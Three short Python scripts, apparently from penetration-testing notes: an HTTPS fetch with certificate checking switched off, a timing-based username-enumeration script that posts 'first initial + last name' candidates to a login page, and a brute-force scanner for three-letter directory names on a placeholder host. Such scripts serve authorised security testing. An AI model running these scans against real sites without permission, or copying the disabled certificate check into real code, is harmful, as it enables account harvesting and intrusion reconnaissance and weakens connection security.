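#!/usr/bin/python3
"""Fetch one page over HTTPS and print its body.

Example of a GET against a server that presents a self-signed X.509
certificate.
"""
import requests

URL = 'https://www.test.com/'

# verify=False switches certificate validation off completely, so the
# connection can be intercepted without the script noticing (requests also
# emits an InsecureRequestWarning for every such call). For a self-signed
# certificate the safer option is to keep validation on and point `verify`
# at the PEM file of that certificate, e.g.
#   VERIFY = '/path/to/server-cert.pem'   # placeholder path
VERIFY = False

# requests has no default timeout: without one a server that never answers
# hangs the script forever.
TIMEOUT = 10

r = requests.get(URL, verify=VERIFY, timeout=TIMEOUT)
print(r.text)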
Timing username harvesting attack
Use case: testing a timing-based username harvesting attack against a login page. Knowing the login pattern (one-letter first initial + last name), the script goes through the alphabet combined with a list of last names gathered via OSINT and submits each candidate to the login page. It prints the request round-trip time and the username, so we can see whether the site is vulnerable to the attack.
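#!/usr/bin/python3
"""Measure the login round-trip time for each candidate username.

Reads last names from user_dictionary.txt, prefixes each with every letter
of the alphabet (the "first initial + last name" login pattern) and posts
the candidate with a deliberately wrong password. Each round-trip time and
candidate is printed on its own line so the output can be sorted.

What the timings show: a login handler whose response time differs between
existing and non-existing accounts leaks which usernames are valid. The
server-side fix is to make both paths take the same time and return the
same generic error message.
"""
import requests
# ascii_lowercase is the string 'abcdefghijklmnopqrstuvwxyz'
from string import ascii_lowercase

LOGIN_URL = 'http://www.test.com/securelogin.php'
WORDLIST = 'user_dictionary.txt'
# requests has no default timeout; without one a single stalled response
# hangs the whole run.
TIMEOUT = 10

with open(WORDLIST, encoding='utf-8') as f:
    # One last name per line: strip the newline and surrounding whitespace,
    # and drop blank lines so no empty-username request is sent.
    lines = [line.strip() for line in f if line.strip()]

for lname in lines:
    for init in ascii_lowercase:
        # Combine the initial with the last name
        username = init + lname
        r = requests.post(
            LOGIN_URL,
            data={'user': username, 'pass': 'badpass', 'button': 'Login'},
            timeout=TIMEOUT,
        )
        # elapsed is measured from sending the request until the response
        # headers arrive, not until the whole body has been read.
        roundtrip = r.elapsed.total_seconds()
        print(f"{roundtrip}: {username}")

# Following command can be run to sort and show the longest round trips
# ./script.py | sort -n | tail -15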
Forced Directory script
Use case: the script runs through aaa to zzz (17,576 requests) and attempts to brute-force directory names. It prints the URL and status code if a 200 or any other non-404 response is returned.
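#!/usr/bin/python3
"""Request every three-letter directory name under a base URL.

Iterates 'aaa' through 'zzz' (26**3 = 17,576 requests) and prints the URL
and status code of every response that is not 404. requests follows
redirects, so the code printed is that of the final response; a server
that answers 200 for unknown paths will print every candidate, so the
output needs manual review.
"""
from itertools import product
# ascii_lowercase is the string 'abcdefghijklmnopqrstuvwxyz'
from string import ascii_lowercase

import requests

url = "http://www.test.com/"  # Base URL
# requests has no default timeout; one unanswered request would otherwise
# stall the remaining thousands.
TIMEOUT = 10

# product(..., repeat=3) yields the same 'aaa'..'zzz' sequence as three
# nested loops over the alphabet.
for letters in product(ascii_lowercase, repeat=3):
    directory = ''.join(letters)
    # Request http://www.test.com/aaa (etc...)
    r = requests.get(url + directory, timeout=TIMEOUT)
    # Anything other than "Not Found" (404) is reported with its status code
    if r.status_code != 404:
        print(f"{url}{directory}: {r.status_code}")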